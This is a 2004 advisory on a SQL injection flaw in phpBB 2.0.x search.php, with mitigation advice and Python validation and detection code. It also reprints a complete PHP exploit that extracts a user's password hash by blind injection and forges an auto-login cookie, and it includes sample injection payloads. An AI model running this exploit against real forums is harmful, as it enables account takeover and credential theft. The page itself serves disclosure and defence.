phpBB search script SQL injection vulnerability
Published: 2004-03-14
Updated: 2004-03-18
Affected systems:
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0
Description:
phpBB2 is a web forum application written in PHP; it supports several database systems and runs on a variety of Unix and Linux operating systems.
The search.php script shipped with phpBB2 does not adequately filter user-supplied parameters. A remote attacker can exploit this to perform SQL injection and obtain sensitive system information.
The problem is that search.php does not adequately filter the "$search_results" parameter. An attacker can submit malicious SQL commands in this parameter, altering the logic of the original SQL query to read information from, or modify, the database. Testing showed that the vulnerability can be used to obtain the administrator's password hash, and phpBB's auto-login feature then allows logging in without cracking the password.
<* Source: pokley (saleh@scan-associates.net)
   Link: http://marc.theaimsgroup.com/?l=bugtraq&m=107936796823781&w=2
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.6 fetch password hash by pokleyzz <pokleyzz at scan-associates.net>
# 4th January 2004 : 3:05 a.m
#
# bug found by pokleyzz (4th January 2004 )
#
# Requirement:
# PHP 4.x with curl extension;
#
# Greet:
# tynon, sk ,wanvadder, sir_flyguy, wxyz , tenukboncit, kerengga_kurus ,
# s0cket370 , b0iler and ...
#
#
# ----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a "teh tarik" in return.
# ----------------------------------------------------------------------------
# (Base on Poul-Henning Kamp Beerware)
#
# Tribute to Search + Wings - "gemuruh.mp3" :P
#
*/
// a:2:{s:11:"autologinid";s:32:"e10adc3949ba59abbe56e057f20f883e";s:6:"userid";s:1:"2";}
$start=time();
if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}
ini_set("max_execution_time","999999");
$matches="mode=viewprofile";
$charmap=array (48,49,50,51,52,53,54,55,56,57,
                97,98,99,100,101,102,
                103,104,105,
                106,107,108,109,110,111,112,113,
                114,115,116,117,118,119,120,121,122
               );
if($argv[3]){
    $url=$argv[1];
    $username=$argv[2];
    //$userid=$argv[2];
    $topic_id=$argv[3];
    if ($argv[4])
        $proxy=$argv[4];
}
else {
    echo "Usage: ".$argv[0]." <URL> <username> <topic_id> [proxy]\n\n";
    echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
    echo "\taid\t username to get (ex: admin)\n";
    echo "\ttopic_id\t topic id where user have post (ex: 1,2,3,45,6)\n";
    echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
    exit;
}
//$action="/search.php?search_id=unanswered";
$action="/search.php?search_id=test";
//$postvar="total_match_count=1&search_forum=1&search_ids[]=";
$postvar="show_results=topics&search_results=";
// detect if sql injection allowed
$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar."'");
$res=curl_exec ($ch);
curl_close ($ch);
//echo $res;
if (!ereg("General Error",$res)){
    echo "Not vulnerable. register_global=off\n";
    exit();
}
$i=0;
$tmp="char(";
while ($i < strlen($username)){
    $tmp .= ord(substr($username,$i,1));
    $i++;
    if ($i < strlen($username)){
        $tmp .= ",";
    }
}
$tmp .= ")";
$cusername=$tmp;
// get userid and data cookie name
//$sql="$topic_id)+AND+pt.post_id=p.post_id+AND+f.forum_id=p.forum_id+AND+p.topic_id=t.topic_id+AND+p.poster_id=u.user_id+and+u.username={$cusername}+ORDER+BY+p.post_time+DESC+LIMIT+0,2/*";
//$sql="99999)+or+(+p.forum_id=$topic_id+and+pt.post_id=p.post_id+AND+f.forum_id=p.forum_id+AND+p.topic_id=t.topic_id+AND+p.poster_id=u.user_id+and+u.username={$cusername}+)+ORDER+BY+p.post_time+DESC+LIMIT+0,15/*";
//$sql="999999)+or+(u.username={$cusername})+LIMIT+0,2/*";
$sql = "$topic_id)+AND+t.topic_poster=u.user_id+AND+f.forum_id=t.forum_id+AND+p.post_id=t.topic_first_post_id+AND+p2.post_id=t.topic_last_post_id+AND+u2.user_id=p2.poster_id+and+u.username={$cusername}+LIMIT+0,2/*";
$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar.$sql);
$res=curl_exec ($ch);
curl_close ($ch);
preg_match("/ (.)*_data=/",$res,$ap);
$cookiename=trim(ereg_replace("=","",$ap[0]));
if (preg_match("/mode=viewprofile&u=.*>$username/i",$res,$ap)){
    preg_match("/mode=viewprofile&u=[0-9]+/i",$ap[0],$ap2);
    $userid=preg_replace("/mode=viewprofile&u=/","",$ap2[0]);
    echo $userid;
}
else {
    echo "\n[x] Error occur... no result for this topic id\n";
    exit();
}
echo "Take your time for Teh Tarik... please wait ...\n\n";
echo "Result:\n";
echo "\t{$userid}:${username}:";
//get password hash
for($i= 1;$i< 33;$i++){
    foreach ($charmap as $char){
        echo chr($char);
        $sql="$topic_id)+AND+t.topic_poster=u.user_id+AND+f.forum_id=t.forum_id+AND+p.post_id=t.topic_first_post_id+AND+p2.post_id=t.topic_last_post_id+AND+u2.user_id=p2.poster_id+and+u.user_id={$userid}+and+ascii(substring(u.user_password,$i,1))={$char}+LIMIT+0,2/*";
        $ch=curl_init();
        if ($proxy){
            curl_setopt($ch, CURLOPT_PROXY,$proxy);
        }
        curl_setopt($ch, CURLOPT_URL,$url.$action);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar.$sql);
        $res=curl_exec ($ch);
        curl_close ($ch);
        if (ereg($matches,$res)){
            //echo chr($char);
            $password .= chr($char);
            break 1;
        }
        else {
            echo chr(8);
        }
        if ($char ==103){
            echo "\n\n[x] Something wrong occur possibly network not stable...\n";
            exit();
        }
    }
}
$autologin=array();
$autologin["autologinid"]=trim($password);
$autologin["userid"]=trim($userid);
$res=serialize($autologin);
$res=ereg_replace(";","%3B",$res);
echo "\n\nAuto login cookies:\n\t{$cookiename}={$res}\n";
?>
Recommendation:
Temporary workaround:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* Disable the register_globals option in php.ini.
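The description above says the flaw is that search.php passes "$search_results" into a query without filtering it, and the workaround is to turn off register_globals. The added example below (written for this page; it is not NSFOCUS's or phpBB's code, and it uses Python rather than phpBB's PHP so that it runs stand-alone) shows the two defensive checks a practitioner would want: an allow-list validator for the parameter, which assumes, as the shape of the proof of concept's own payloads ("<topic_id>)+AND+...") implies, that search_results is meant to be a comma-separated list of numeric ids closing an IN(...) list, and a request-body classifier that flags the boolean-based extraction pattern so it can be logged or blocked at a WAF or in the application. The request bodies are constructed samples modelled on the page's payload shape, not captured traffic.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Constructed sample POST bodies to search.php (not from the advisory).
# The first is what a legitimate phpBB 2 results page sends; the others
# mimic the shape of the tampered parameter described on this page.
SAMPLE_BODIES = [
    "show_results=topics&search_results=12,15,99",
    "show_results=topics&search_results=",
    "show_results=topics&search_results=1)+AND+u.username=char(97,100,109,105,110)+LIMIT+0,2/*",
    "show_results=topics&search_results=1)+AND+ascii(substring(u.user_password,1,1))=97+LIMIT+0,2/*",
]

# Allow-list: one or more decimal ids separated by single commas, nothing else.
# Assumption (hypothetical for this example): that is all search.php needs.
ID_LIST = re.compile(r"[0-9]+(,[0-9]+)*")

# Signatures of the technique described on the page. Matching is done on the
# URL-decoded value, so "+" has already become a space.
INJECTION_MARKERS: Dict[str, re.Pattern] = {
    "paren_then_boolean": re.compile(r"\)\s*(and|or)\s", re.I),   # breaks out of IN(...)
    "blind_char_compare": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),
    "char_encoded_string": re.compile(r"\bchar\s*\(", re.I),     # char(97,...) literal
    "trailing_comment": re.compile(r"/\*\s*$"),                  # swallows rest of query
}


def parse_search_results(raw: str) -> Optional[List[int]]:
    """Return the list of ids if the value is well-formed, else None (reject).

    This is the check search.php should perform before interpolating the
    value into SQL; anything that is not a plain id list is refused outright.
    """
    if not ID_LIST.fullmatch(raw):
        return None
    return [int(x) for x in raw.split(",")]


def classify_body(body: str) -> Dict[str, object]:
    """Classify one application/x-www-form-urlencoded POST body.

    verdict is "allow" for a valid id list, "injection" when the value fails
    validation and carries one of the known signatures, and "reject" for any
    other malformed value (still refused, but not worth an alert on its own).
    """
    params = parse_qs(body, keep_blank_values=True)
    raw = params.get("search_results", [""])[0]
    ids = parse_search_results(raw)
    markers = [name for name, rx in INJECTION_MARKERS.items() if rx.search(raw)]
    if ids is not None:
        verdict = "allow"
    elif markers:
        verdict = "injection"
    else:
        verdict = "reject"
    return {"raw": raw, "ids": ids, "markers": markers, "verdict": verdict}


def scan(bodies: List[str]) -> List[str]:
    """Return the verdict for each body, in order."""
    return [str(classify_body(b)["verdict"]) for b in bodies]


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        result = classify_body(body)
        print(f"{result['verdict']:9s} markers={result['markers']} value={result['raw']!r}")
```

The validator is the actual fix: once search_results is rejected unless it is a plain id list, the register_globals setting no longer matters for this code path. The marker list is only there so that rejected requests carrying the page's payload shape can be distinguished from ordinary malformed input when reviewing logs.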
Vendor patch:
phpBB Group
-----------
The vendor has not yet released a patch or upgrade. We recommend that users of this software check the vendor's homepage regularly for the latest version:
http://www.phpbb.com/